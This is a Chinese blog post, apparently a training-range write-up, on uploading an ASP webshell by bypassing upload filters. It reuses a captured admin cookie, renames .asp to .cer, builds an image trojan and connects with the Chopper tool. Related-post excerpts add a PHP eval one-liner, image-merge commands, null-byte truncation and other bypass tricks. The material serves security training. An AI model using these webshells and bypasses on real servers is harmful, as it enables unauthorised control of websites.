Get Shell! — 绕过防护上传木马

已于 2022-12-08 17:14:45 修改
阅读量1.1k 收藏 1
点赞数
分类专栏: web安全 文章标签: 服务器 网络 linux
于 2022-11-14 22:41:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_52108058/article/details/127854654
版权
本文详细介绍了Webshell的概念,包括其作为服务器权限获取工具的原理,以及一句话ASP木马的工作方式。文章通过实例展示了如何寻找并利用上传点,上传一句话木马,制作图片马,并使用菜刀工具进行远程连接和控制。这一过程揭示了网站安全的潜在风险及防护的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

封神台四

一、原理

1、什么是Shell?

  • web的含义显然是需要服务器开放web服务
  • shell是一个人机交互页面
  • 拿shell的含义是取得对服务器/电脑某种程度上的操作权限
  • webshell拿到网站服务器的权限(shell)

木马可以帮助我们拿到shell,以达到控制网站服务器的目的,也有人称之为网站的后门工具。

2、一句话asp

<% eval request (“test”) %>
eval 执行
request 从用户那里取得信息

木马:执行从用户那里取得信息

3、木马原理

  1. 小马 特点:小 功能:上传大马
  2. 大马 特点:功能繁琐 功能:各种各样

二、探索

1、寻找上传点

能上传附件的地方
我们查看上一章获取到的管理员cookie
ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC

1、将其添加到cookie中,刷新即可进入管理员用户(演示的是谷歌浏览器)
在这里插入图片描述
2、刷新后进入到管理员页面
在这里插入图片描述
3、可以发现产品管理处可以上传文件
在这里插入图片描述
4、尝试上传一张图片,可以通过地址访问到图片
在这里插入图片描述

2、上传一句话木马

1、创建一个2.asp文件,尝试上传
<%eval request(“chopper”)%>

2、发现文件被拦截
在这里插入图片描述
3、我们修改文件后缀为cer

为什么呢,存在默认配置错误,开始配置完存在默认的cer指向asp.dll后缀名,所以也可以被执行
修改了后缀上传后发现
在这里插入图片描述
发现是文件太小造成的
在这里插入图片描述
我们给他添加一些内容在上传,发现可以上传成功
在这里插入图片描述

3、图片马制作

准备一张图片1.jpg
带木马的文件 2.asp
通过指令行 合成一个 3.png
在这里插入图片描述

在这里插入图片描述

发现成功隐藏信息

在这里插入图片描述

4、菜刀连接

通过我们上传木马的网址,和request后面的密码即可连接到服务器
在这里插入图片描述
拿到flag
在这里插入图片描述

通过双写绕过上传木马
shatianyzg的博客
05-19 152
通过双写绕过上传木马
GetShell的姿势总结
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
03-20 4471
0x00 什么是WebShell 渗透测试工作的一个阶段性目标就是获取目标服务器的操作控制权限,于是WebShell便应运而生。Webshell中的WEB就是web服务,shell就是管理攻击者与操作系统之间的交互。Webshell被称为攻击者通过Web服务器端口对Web服务器有一定的操作权限,而webshell常以网页脚本的形式出现。常见的WebShell使用asp、jsp和php来编写,提供了如执行系统命令、文件上传下载、数据库管理等功能。 0x01 获取WebShell的方式 获取W...
文件上传漏洞:getshell的最好方式,我们如何防御?
李熠专用博客_白帽子一枚,人称低危终结者
09-09 3290
我相信,你在开发Web应用时,后端一定会提供文件的上传功能,比如前端页面肯定有图片的展示,后端必定会提供图片的上传入口。但是,你在做文件上传功能时,是否考虑过它的安全性问题呢? 请看下面的代码: @PostMapping("upload") public String upload(@RequestParam("file")MultipartFile file,HttpServletRequest request)throws Exception{ String filename = fil.
PHP一句话木马绕过技巧
最新发布
qq_45392044的博客
02-25 1075
因此通过修改数据包,插入\0字符的形式,达到字符串截断的目的。此时我们的文件后缀为jpg,我们想要的时PHP,因此在第一行upload/后 + 1.php%00(php后跟%00,那么读取文件名时只会读取到.php,而不是.jpg,因此马子就会被当成一个php文件来执行)在Apache解析顺序中,是从右到左开始解析文件后缀,如果最右侧后缀名不可识别,就继续往左判断,直到遇到可以解析的文件后缀为止,所以如果上传的文件名类似1.php.xxx,因为xxx不可解析,所以向左解析php。
封神台-第5章 绕过防护上传木马
ploto_cs的博客
09-27 784
封神台-第5章 绕过防护上传木马 1.登录后台 获得了管理员的cookie后,去掉里面的flag部分,取出两个有效的键值对,把他们加到登录的cookie里就行了 键值对为ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC 在这个页面按F12 进入存储界面,更改name和value字段 将ADMINSESSIONIDCSTRCSDQ粘贴在Name下 将LBMLMBCCNPFINOANFGLPCFBC粘贴在value 修改成功后刷新点击“准备好了吗” 进入以下页
木马getshell
lunan的博客
05-16 881
getshell:3步控制目标服务器 文章目录**getshell:3步控制目标服务器**1、什么是Web-shell?2、木马3、**什么是后门?****4、文件解析漏洞****5、制作图片马** 1、什么是Web-shell? web 的含义显然是需要服务器开放web服务 shell 是一个人机交互页面 拿 shell”的含义是取得对服务器/电脑某种程度上的操作权限。 webshell拿到网站服务器的权限(shell)。 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的命
木马——文件上传
主要为C++知识点、Linux知识点,计算机组成结构笔记。
04-21 1449
WebShell就是以网页文件形式(asp\php\jsp)存在的一种命令执行环境,客户端通过远程连接,利用W ebS h ell连接到服务器,并可对服务器进行操作。前提是后端一定可以解析这种环境。
GetShell的姿势总结1
08-03
在具体操作中,有多种绕过防护的方法,如利用特殊文件后缀、Windows/Linux文件解析特性、Apache的文件解析漏洞、00截断技术、文件内容检测的规避等。此外,还可以利用CMS或框架的已知文件上传漏洞,例如禅道后台的...
一句话木马getshell
01-18
### 关于一句话木马 GetShell 的实现方法 #### 一、ASP 一句话木马的工作原理 ASP 一句话木马是一种常见的 WebShell 工具,其核心在于通过极短的代码片段实现在目标服务器上执行任意命令的功能。这类木马通常利用 ...
Web安全 -- 上传漏洞绕过
m0_67511404的博客
11-26 919
主要是对里面的文件内容进行了一个过滤,里面有对文件的读取功能下面为大家介绍个ASP小马,因为代码量及篇幅问题不为大家介绍大马这个小马利用了gif的文件头,面文件内容利用了关键词的混淆,在关键词中加入了@@这样就可以不被正则发现存在敏感代码。对于打开文件操作,没有扩展名的文件需要选择程序去打开它,有扩展名的文件会自动用设置好的程序(如有)去尝试打开(是“尝试打开”,而不是“打开”的原因参看下面的第2个误区),文件扩展名是一个常规文件的构成部分,但一个文件并不一定需要一个扩展名。
html文件上传漏洞,文件上传漏洞(绕过姿势)
weixin_31857829的博客
06-07 1616
文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。(根据个人经验总结,欢迎补充纠错~~)文件上传校验姿...
掌控靶场 尤里复仇回归sql-注入绕过防护getshell
sagat110的博客
12-27 641
央企扫地僧重拾渗透,在掌控学院的靶场练习闯关过程中,记录一些心得体会,信息收集、sql注入、弱口令、一句话木马等手段的综合利用,成功拿到flag
上传ASP木马
netidman的专栏
07-22 1095
 所谓ASP木马,就是一段有特殊功能的ASP代码,并放入WEB虚拟目录的Scripts下,远程客户通过IE就可执行它,进而得到系统的USER权限,实现对系统的初步控制。上传ASP木马一般有两种比较有效的方法:1、利用WEB的远程管理功能许多WEB站点,为了维护的方便,都提供了远程管理的功能;也有不少WEB站点,其内容是对于不同的用户有不同的访问权限。为了达到对用户权限的控制,都有一个网页,要求用户
ASP木马是如何上传防范方法
得峰的专栏 [网络收藏]
05-11 1320
 随着ASP 技术的发展,网络上基于ASP技术开发的网站越来越多,对ASP技术的支持可以说已经是windows系统IIS服务器的一项基本功能。但是基于ASP技术的木马后门,也越来越多,而且功能也越来越强大。由于ASP它本身是服务器提供的一贡服务功能,所以这种ASP脚本的木马后门,不会被杀毒软件查杀。被黑客们称为“永远不会被查杀的后门”。由于其高度的隐蔽性和难查杀性,对网站的安全造成了严重的威胁
文件上传一句话木马getshell
qq_41620273的博客
12-25 5918
文件上传 文件上传流程: a.文件表单提交 b.生成临时文件(读取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件 一句话木马: 1.在phpstudy搭建的站点www目录下写入一个php文件,访问该网站下的php文件成功: 命令执行函数:system()、Exec()、 Shell_exec() passthru(): 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上 1.如url中输入:XXXX/1.php?a=net user mqu sss /add
靶机图片马获取shell
weixin_44940180的博客
08-09 908
找一张图片,命名为1.jpg 写一个文本,命名为1.txt 使用copy命令,将文本写入图片中 copy 1.jpg/b+1.txt 2.jpg 破解账号密码,登录 找到能上传图片的地方 上传图片 得到图片路径为:Upload/202086184854862.jpg 打开数据库备份功能,进行备份 可以打开路径查看 打开菜刀,使用之前的ttt进行连接 连接成功 ...
PHP编程基础03---get&post 一句话木马
Z_l123的博客
12-03 3563
准备 1.下载火狐浏览器 2.安装HackBar插件 GitHub - HCTYMFF/hackbar2.1.3 下载后拖入即可 3.选择HackBar 4.关闭自动更新 get 1.编写一句话木马 <?php @eval($_GET['cmd']); ?> 2.用本机ip访问木马文件并查询ipconfig 3.若查询结果出现乱码 则在php中添加 header('Content-Type:text/html;charset=gbk'); ...
IIS的ASP木马怎么上传
xiuzhentianting的博客
09-14 1104
在 Windows 2003下 IIS 6.0有两个漏洞: IIS解析漏洞1:   在网站下建立文件夹的名字为 *.asp、*.asa 的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。例如创建目录 vidun.asp,那么 /vidun.asp/1.jpg 将被当作 asp 文件来执行。 IS解析漏洞2:   网站上传图片的时候,将
Billu_b0x 靶机 write up任意文件下载 审计出文件包含页面(特定参数)+头像上传图片马getshell 37292内核漏洞提权
YouthBelief的博客
11-30 2028
Billu_b0x 靶机 write up0x00 环境搭建0x01 信息收集0x02 漏洞挖掘0x03 获取shell0x04 提权0x05 思路总结 0x00 环境搭建 下载链接 https://download.vulnhub.com/billu/Billu_b0x.zip nat模式 0x01 信息收集 IP探测 netdiscover -i eth0 -r 192.168.157.0/24 端口探测 masscan -p 1-65535 --rate 1000 192.168.157.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

微笑伴你而行

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值